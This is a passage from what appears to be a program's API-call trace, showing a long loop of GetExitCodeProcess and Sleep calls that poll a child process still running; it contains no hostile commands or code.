(dwMilliseconds=0x19) [0164.836] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0164.836] Sleep (dwMilliseconds=0x19) [0164.896] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0164.896] Sleep (dwMilliseconds=0x19) [0164.975] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0164.975] Sleep (dwMilliseconds=0x19) [0165.219] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0165.219] Sleep (dwMilliseconds=0x19) [0165.355] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0165.355] Sleep (dwMilliseconds=0x19) [0165.433] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0165.433] Sleep (dwMilliseconds=0x19) [0165.517] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0165.518] Sleep (dwMilliseconds=0x19) [0165.614] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0165.614] Sleep (dwMilliseconds=0x19) [0165.666] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0165.666] Sleep (dwMilliseconds=0x19) [0165.705] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0165.705] Sleep (dwMilliseconds=0x19) [0165.745] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0165.745] Sleep (dwMilliseconds=0x19) [0165.781] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0165.782] Sleep (dwMilliseconds=0x19) [0165.836] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0165.836] Sleep (dwMilliseconds=0x19) [0165.913] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0165.913] Sleep (dwMilliseconds=0x19) [0165.955] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0165.955] Sleep (dwMilliseconds=0x19) [0165.997] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0165.997] Sleep (dwMilliseconds=0x19) [0166.133] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.134] Sleep (dwMilliseconds=0x19) [0166.187] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.187] Sleep (dwMilliseconds=0x19) [0166.226] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.226] Sleep (dwMilliseconds=0x19) [0166.265] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.265] Sleep (dwMilliseconds=0x19) [0166.301] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.301] Sleep (dwMilliseconds=0x19) [0166.337] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.338] Sleep (dwMilliseconds=0x19) [0166.373] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.373] Sleep (dwMilliseconds=0x19) [0166.413] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.414] Sleep (dwMilliseconds=0x19) [0166.503] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.503] Sleep (dwMilliseconds=0x19) [0166.543] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.543] Sleep (dwMilliseconds=0x19) [0166.579] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.579] Sleep (dwMilliseconds=0x19) [0166.614] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.614] Sleep (dwMilliseconds=0x19) [0166.650] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.650] Sleep (dwMilliseconds=0x19) [0166.690] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.691] Sleep (dwMilliseconds=0x19) [0166.726] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.726] Sleep (dwMilliseconds=0x19) [0166.762] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.762] Sleep (dwMilliseconds=0x19) [0166.807] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.807] Sleep (dwMilliseconds=0x19) [0166.843] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.844] Sleep (dwMilliseconds=0x19) [0166.894] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.894] Sleep (dwMilliseconds=0x19) [0166.938] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0166.938] Sleep (dwMilliseconds=0x19) [0167.017] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.017] Sleep (dwMilliseconds=0x19) [0167.113] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.113] Sleep (dwMilliseconds=0x19) [0167.160] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.160] Sleep (dwMilliseconds=0x19) [0167.208] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.209] Sleep (dwMilliseconds=0x19) [0167.251] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.251] Sleep (dwMilliseconds=0x19) [0167.290] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.291] Sleep (dwMilliseconds=0x19) [0167.333] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.333] Sleep (dwMilliseconds=0x19) [0167.386] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.386] Sleep (dwMilliseconds=0x19) [0167.421] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.421] Sleep (dwMilliseconds=0x19) [0167.458] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.458] Sleep (dwMilliseconds=0x19) [0167.498] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.498] Sleep (dwMilliseconds=0x19) [0167.539] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.539] Sleep (dwMilliseconds=0x19) [0167.576] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.576] Sleep (dwMilliseconds=0x19) [0167.623] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.623] Sleep (dwMilliseconds=0x19) [0167.668] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.668] Sleep (dwMilliseconds=0x19) [0167.706] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.706] Sleep (dwMilliseconds=0x19) [0167.741] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.741] Sleep (dwMilliseconds=0x19) [0167.778] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.779] Sleep (dwMilliseconds=0x19) [0167.829] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.829] Sleep (dwMilliseconds=0x19) [0167.884] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.884] Sleep (dwMilliseconds=0x19) [0167.919] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.919] Sleep (dwMilliseconds=0x19) [0167.958] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0167.958] Sleep (dwMilliseconds=0x19) [0168.001] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0168.001] Sleep (dwMilliseconds=0x19) [0168.037] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0168.037] Sleep (dwMilliseconds=0x19) [0168.269] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0168.269] Sleep (dwMilliseconds=0x19) [0168.338] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0168.338] Sleep (dwMilliseconds=0x19) [0168.378] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0168.378] Sleep (dwMilliseconds=0x19) [0168.417] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0168.417] Sleep (dwMilliseconds=0x19) [0168.457] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0168.457] Sleep (dwMilliseconds=0x19) [0168.503] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0168.503] Sleep (dwMilliseconds=0x19) [0168.552] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0168.552] Sleep (dwMilliseconds=0x19) [0168.600] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0168.600] Sleep (dwMilliseconds=0x19) [0168.634] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0168.634] Sleep (dwMilliseconds=0x19) [0168.669] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0168.669] Sleep (dwMilliseconds=0x19) [0168.709] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0168.709] Sleep (dwMilliseconds=0x19) [0168.745] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0168.745] Sleep (dwMilliseconds=0x19) [0168.789] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0168.832] Sleep (dwMilliseconds=0x19) [0168.896] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0168.903] Sleep (dwMilliseconds=0x19) [0168.995] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0168.995] Sleep (dwMilliseconds=0x19) [0169.040] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0169.040] Sleep (dwMilliseconds=0x19) [0169.171] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0169.171] Sleep (dwMilliseconds=0x19) [0169.227] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0169.227] Sleep (dwMilliseconds=0x19) [0169.267] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0169.267] Sleep (dwMilliseconds=0x19) [0169.304] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0169.304] Sleep (dwMilliseconds=0x19) [0169.340] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0169.340] Sleep (dwMilliseconds=0x19) [0169.384] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0169.384] Sleep (dwMilliseconds=0x19) [0169.452] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0169.452] Sleep (dwMilliseconds=0x19) [0169.492] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0169.506] Sleep (dwMilliseconds=0x19) [0169.545] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0169.545] Sleep (dwMilliseconds=0x19) [0169.632] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0169.632] Sleep (dwMilliseconds=0x19) [0169.684] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0169.684] Sleep (dwMilliseconds=0x19) [0169.758] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0169.758] Sleep (dwMilliseconds=0x19) [0169.852] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0169.852] Sleep (dwMilliseconds=0x19) [0169.935] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0169.935] Sleep (dwMilliseconds=0x19) [0169.973] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0169.973] Sleep (dwMilliseconds=0x19) [0170.236] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.236] Sleep (dwMilliseconds=0x19) [0170.317] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.317] Sleep (dwMilliseconds=0x19) [0170.366] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.367] Sleep (dwMilliseconds=0x19) [0170.403] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.404] Sleep (dwMilliseconds=0x19) [0170.439] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.439] Sleep (dwMilliseconds=0x19) [0170.475] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.475] Sleep (dwMilliseconds=0x19) [0170.511] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.511] Sleep (dwMilliseconds=0x19) [0170.553] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.553] Sleep (dwMilliseconds=0x19) [0170.588] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.588] Sleep (dwMilliseconds=0x19) [0170.623] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.623] Sleep (dwMilliseconds=0x19) [0170.659] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.659] Sleep (dwMilliseconds=0x19) [0170.695] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.695] Sleep (dwMilliseconds=0x19) [0170.731] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.731] Sleep (dwMilliseconds=0x19) [0170.766] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.766] Sleep (dwMilliseconds=0x19) [0170.801] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.801] Sleep (dwMilliseconds=0x19) [0170.844] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.844] Sleep (dwMilliseconds=0x19) [0170.917] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.917] Sleep (dwMilliseconds=0x19) [0170.956] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0170.957] Sleep (dwMilliseconds=0x19) [0171.000] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.000] Sleep (dwMilliseconds=0x19) [0171.043] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.043] Sleep (dwMilliseconds=0x19) [0171.254] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.254] Sleep (dwMilliseconds=0x19) [0171.291] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.291] Sleep (dwMilliseconds=0x19) [0171.336] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.336] Sleep (dwMilliseconds=0x19) [0171.384] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.384] Sleep (dwMilliseconds=0x19) [0171.420] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.420] Sleep (dwMilliseconds=0x19) [0171.457] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.457] Sleep (dwMilliseconds=0x19) [0171.498] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.498] Sleep (dwMilliseconds=0x19) [0171.535] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.535] Sleep (dwMilliseconds=0x19) [0171.569] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.569] Sleep (dwMilliseconds=0x19) [0171.604] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.604] Sleep (dwMilliseconds=0x19) [0171.642] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.642] Sleep (dwMilliseconds=0x19) [0171.682] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.682] Sleep (dwMilliseconds=0x19) [0171.737] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.737] Sleep (dwMilliseconds=0x19) [0171.776] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.776] Sleep (dwMilliseconds=0x19) [0171.814] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.814] Sleep (dwMilliseconds=0x19) [0171.850] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.850] Sleep (dwMilliseconds=0x19) [0171.906] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.906] Sleep (dwMilliseconds=0x19) [0171.945] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0171.945] Sleep (dwMilliseconds=0x19) [0172.000] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0172.000] Sleep (dwMilliseconds=0x19) [0172.035] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0172.035] Sleep (dwMilliseconds=0x19) [0172.116] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0172.117] Sleep (dwMilliseconds=0x19) [0172.159] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0172.159] Sleep (dwMilliseconds=0x19) [0172.195] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0172.195] Sleep (dwMilliseconds=0x19) [0172.235] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0172.235] Sleep (dwMilliseconds=0x19) [0172.320] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0172.320] Sleep (dwMilliseconds=0x19) [0172.567] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0172.567] Sleep (dwMilliseconds=0x19) [0172.625] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0172.625] Sleep (dwMilliseconds=0x19) [0172.666] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0172.666] Sleep (dwMilliseconds=0x19) [0172.763] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0172.763] Sleep (dwMilliseconds=0x19) [0172.814] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0172.814] Sleep (dwMilliseconds=0x19) [0172.885] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0172.885] Sleep (dwMilliseconds=0x19) [0172.924] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0172.924] Sleep (dwMilliseconds=0x19) [0172.987] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0172.987] Sleep (dwMilliseconds=0x19) [0173.025] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.025] Sleep (dwMilliseconds=0x19) [0173.135] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.135] Sleep (dwMilliseconds=0x19) [0173.175] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.175] Sleep (dwMilliseconds=0x19) [0173.214] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.214] Sleep (dwMilliseconds=0x19) [0173.251] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.251] Sleep (dwMilliseconds=0x19) [0173.303] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.303] Sleep (dwMilliseconds=0x19) [0173.339] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.339] Sleep (dwMilliseconds=0x19) [0173.385] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.385] Sleep (dwMilliseconds=0x19) [0173.425] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.425] Sleep (dwMilliseconds=0x19) [0173.462] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.462] Sleep (dwMilliseconds=0x19) [0173.502] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.502] Sleep (dwMilliseconds=0x19) [0173.543] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.543] Sleep (dwMilliseconds=0x19) [0173.704] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.704] Sleep (dwMilliseconds=0x19) [0173.742] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.743] Sleep (dwMilliseconds=0x19) [0173.777] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.777] Sleep (dwMilliseconds=0x19) [0173.814] GetExitCodeProcess (in: hProcess=0x40c, 